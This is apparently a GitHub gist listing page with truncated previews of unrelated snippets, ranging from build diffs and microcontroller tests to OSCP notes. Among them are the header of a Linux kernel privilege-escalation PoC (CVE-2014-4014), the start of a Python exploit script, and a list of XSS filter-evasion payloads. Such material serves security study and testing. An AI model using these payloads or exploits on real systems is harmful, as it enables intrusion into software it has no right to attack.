vulnerable function:
export from libavfilter/vf_signature.c
static int export(AVFilterContext *ctx, StreamContext *sc, int input)
{
SignatureContext* sic = ctx->priv;
char filename[1024];
Peter Teoh tthtlc
jduck
/ strace-static.diff
Last active
December 28, 2015 13:48
Enable static for building strace for Android
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # dev:~/android/source/external/strace$ git diff | |
| # | |
| # to apply & build: | |
| # | |
| # dev:~/android/source/external/strace$ patch -p1 < strace-static.diff | |
| # dev:~/android/source/external/strace$ cd ../.. | |
| # dev:~/android/source$ mmm external/strace | |
| # | |
| diff --git a/Android.mk b/Android.mk | |
| index 5274280..4f1707e 100644 |
nicholasjconn
/ ACLK_Test.c
Last active
April 4, 2017 17:46
ACLK Test for LaunchPad (http://msp430launchpad.com)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /****************************************************************************** | |
| * MSP430G2553 ACLK Test | |
| * | |
| * Description: This code can be used to test if you have installed the | |
| * 32.768kHz crystal on your LaunchPad correctly. Using this code | |
| * LED1 (on P1.0) will turn on for 1 second, and off for one | |
| * second. You can verify this with either an oscilloscope, logic | |
| * analyzer, or by inspection. Simple as that! | |
| * | |
| * This code was originally created for "NJC's MSP430 |
tthtlc
/ OSCP note A'
Created
May 27, 2018 10:44
— forked from c4ri0c4/OSCP note A'
OSCP notes A & B may have some commons
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| OSCP Handy Commands | |
| Nmap Full Web Vulnerable Scan: | |
| mkdir /usr/share/nmap/scripts/vulscan | |
| cd /usr/share/nmap/scrripts/vulscan | |
| wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz |
infoslack
/ local-exploit.c
Created
June 22, 2014 01:38
CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC | |
| * | |
| * Vitaly Nikolenko | |
| * http://hashcrack.org | |
| * | |
| * Usage: ./poc [file_path] | |
| * | |
| * where file_path is the file on which you want to set the sgid bit | |
| */ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import telnetlib | |
| import struct | |
| """ | |
| developed on stream: https://www.youtube.com/watch?v=zWgS6fTw4Ts | |
| """ | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect(('127.0.0.1', 2323)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import networkx | |
| import angr | |
| import tracer | |
| import sys | |
| import os | |
| import logging | |
| import pickle | |
| import argparse | |
| from collections import Counter |
bruce30262
/ ARMDebianUbuntu.md
Last active
June 12, 2023 11:43
— forked from Liryna/ARMDebianUbuntu.md
Emulating ARM on Debian/Ubuntu
You might want to read this to get an introduction to armel vs armhf.
If the below is too much, you can try Ubuntu-ARMv7-Qemu but note it contains non-free blobs.
First, cross-compile user programs with GCC-ARM toolchain. Then install qemu-arm-static so that you can run ARM executables directly on linux
If there's no qemu-arm-static in the package list, install qemu-user-static instead
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import * | |
| answer = sr1(IP(dst="8.8.8.8")/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname="www.thepacketgeek.com")),verbose=0) | |
| print answer[DNS].summary() |
OlderNewer